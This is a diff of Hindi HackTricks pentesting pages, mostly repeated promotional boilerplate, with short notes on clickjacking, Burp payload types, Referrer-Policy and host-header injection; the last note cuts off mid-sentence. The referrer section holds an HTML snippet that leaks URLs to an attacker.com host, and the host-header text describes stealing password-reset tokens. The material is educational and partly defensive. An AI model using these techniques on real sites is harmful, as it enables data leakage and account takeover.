* [**Clickjaking**](pentesting-web/clickjacking.md): यदि इस हमले के खिलाफ कोई सुरक्षा नहीं है, तो आप उपयोगकर्ता को धोखा देकर संवेदनशील डेटा आपको भेजने के लिए मजबूर कर सकते हैं (एक उदाहरण [यहाँ](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))। * [**क्लिकजैकिंग**](pentesting-web/clickjacking.md): यदि इस हमले के खिलाफ कोई सुरक्षा नहीं है, तो आप उपयोगकर्ता को धोखा देकर संवेदनशील डेटा भेजने में सक्षम हो सकते हैं (एक उदाहरण [यहाँ](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))।
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details> </details>
{% endhint %}

View file

@ -1,13 +1,14 @@
{% hint style="success" %}
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**हैकट्रिक्स प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (एआरटीई)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**हैकट्रिक्स प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (जीआरटीई)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो करें**.
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स **शेयर करें**.
</details> </details>
{% endhint %}

View file

@ -1,43 +1,29 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details> </details>
{% endhint %}
# मूल Payloads # मूल पेलोड
* **सरल सूची:** बस एक सूची जिसमें प्रत्येक पंक्ति में एक प्रविष्टि होती है * **सरल सूची:** हर पंक्ति में एक प्रविष्टि वाली सूची
* **रनटाइम फ़ाइल:** एक सूची जो रनटाइम में पढ़ी जाती है (मेमोरी में लोड नहीं होती)। बड़ी सूचियों का समर्थन करने के लिए। * **रनटाइम फ़ाइल:** रनटाइम में पढ़ी गई सूची (मेमोरी में लोड नहीं की गई)। बड़ी सूचियों का समर्थन करने के लिए।
* **केस मॉडिफिकेशन:** स्ट्रिंग्स की एक सूची में कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचले केस में, ऊपरी केस में, प्रॉपर नाम - पहला अक्षर बड़ा और बाकी निचले केस में-, प्रॉपर नाम -पहला अक्षर बड़ा और बाकी वैसे ही रहते हैं-। * **केस संशोधन:** स्ट्रिंग की सूची पर कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचे, ऊपर, उचित नाम - पहले कैपिटलाइज़्ड और बाकी को निचे करना-, उचित नाम - पहले कैपिटलाइज़्ड और बाकी वैसा ही रहना-।
* **संख्याएँ:** X से Y तक Z कदम या यादृच्छिक रूप से संख्याएँ उत्पन्न करें * **नंबर्स:** X से Y तक नंबर उत्पन्न करें Z कदम या यादृच्छिक रूप से।
* **ब्रूट फोर्सर:** अक्षर सेट, न्यूनतम और अधिकतम लंबाई। * **ब्रूट फोर्सर:** वर्ण सेट, न्यूनतम और अधिकतम लंबाई।
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : DNS अनुरोधों के माध्यम से कमांड्स को निष्पादित करने और आउटपुट प्राप्त करने के लिए Payload [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : कमांड निष्पादित करने और आउटपुट को burpcollab के DNS अनुरोधों के माध्यम से पकड़ने के लिए पेलोड
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details>

View file

@ -1,29 +1,35 @@
# ईमेल सुरक्षा की कमियाँ # ईमेल सुरक्षा कमियाँ
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary>HackTricks का समर्थन करें</summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
</details> </details>
{% endhint %}
## ##
## ##
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary>HackTricks का समर्थन करें</summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
</details> </details>
{% endhint %}

View file

@ -1,29 +1,30 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details> </details>
{% endhint %}
# Referrer headers और policy # रेफरर हेडर्स और नीति
Referrer वह header है जिसका उपयोग ब्राउज़र यह इंगित करने के लिए करते हैं कि पिछला पृष्ठ कौन सा था। रेफरर वह हेडर है जिसका उपयोग ब्राउज़र द्वारा किया जाता है ताकि पता चले कि पिछले दौरे का कौन सा पृष्ठ देखा गया था।
## संवेदनशील जानकारी का लीक होना ## संवेदनशील जानकारी लीक हो गई
यदि किसी वेब पेज के अंदर किसी बिंदु पर कोई संवेदनशील जानकारी GET request पैरामीटर्स पर स्थित होती है, और यदि पेज में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उपयोगकर्ता को उस URL पर जाने के लिए मना सकता है (सामाजिक इंजीनियरिंग) जो हमलावर द्वारा नियंत्रित होता है। तो वह नवीनतम GET request के अंदर संवेदनशील जानकारी को बाहर निकालने में सक्षम हो सकता है। यदि किसी वेब पृष्ठ के अंदर किसी GET अनुरोध पैरामीटर पर कोई संवेदनशील जानकारी होती है, यदि पृष्ठ में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उसे एक URL पर जाने के लिए मजबूर करता है/सुझाव देता है (सोशल इंजीनियरिंग), तो वह हमलावर संवेदनशील जानकारी को नवीनतम GET अनुरोध के अंदर निकाल सकता है।
## निवारण ## संशोध
आप ब्राउज़र को एक **Referrer-policy** का पालन करने के लिए बना सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशन्स को भेजे जाने से **रोक** सकता है: आप ब्राउज़र को एक **रेफरर-नीति** का पालन करने के लिए कर सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशनों को भेजने से **बचा** सकता है:
``` ```
Referrer-Policy: no-referrer Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade Referrer-Policy: no-referrer-when-downgrade
@ -34,28 +35,28 @@ Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url Referrer-Policy: unsafe-url
``` ```
## प्रतिरोध-निवारण ## काउंटर-मिटिगेशन
आप इस नियम को एक HTML मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को HTML इंजेक्शन का शोषण करने की आवश्यकता है): आप इस नियम को एचटीएमएल मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को एचटीएमएल इंजेक्शन का शोषण करना होगा):
```markup ```markup
<meta name="referrer" content="unsafe-url"> <meta name="referrer" content="unsafe-url">
<img src="https://attacker.com"> <img src="https://attacker.com">
``` ```
## रक्षा ## रक्षा
URL में GET पैरामीटर्स या पथों के अंदर कभी भी संवेदनशील डेटा न रखें। कभी भी URL में GET पैरामीटर या पथ में कोई भी संवेदनशील डेटा न डालें।
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details> </details>
{% endhint %}

View file

@ -1,34 +1,63 @@
# अन्य वेब ट्रिक्स # अन्य वेब ट्रिक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary>HackTricks का समर्थन करें</summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने ट्रिक्स साझा करें**.
</details> </details>
{% endhint %}
### होस्ट हडर ### होस्ट हडर
कई बार बैक-एंड **होस्ट हैडर** पर भरोसा करता है कि कुछ कार्रवाई करें। उदाहरण के लिए, यह इसका मूल्य उपयोग करके **पासवर्ड रीसेट भेजने के लिए डोमेन** के रूप में इस्तेमाल कर सकता है। तो जब आपको अपना पासवर्ड रीसेट करने के लिए एक लिंक वाला ईमेल मिलता है, तो उपयोग किया जा रहा डोमेन वही होता है जिसे आपने होस्ट हैडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं के पासवर्ड रीसेट को अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुराने के लिए अपने नियंत्रण में एक डोमेन पर बदल सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). कई बार बैक-एंड **होस्ट हेडर** पर भरोसा करता है **कुछ क्रियाएँ करने के लिए**। उदाहरण के लिए, यह अपने मान्यता को **पासवर्ड रीसेट भेजने के लिए उसका मान्यता उपयोग कर सकता है**। तो जब आप एक ईमेल प्राप्त करते हैं जिसमें अपना पासवर्ड रीसेट करने का लिंक होता है, तो उस डोमेन का उपयोग किया जा रहा है वह डोमेन है जिसे आपने होस्ट हेडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं का पासवर्ड रीसेट करने का अनुरोध 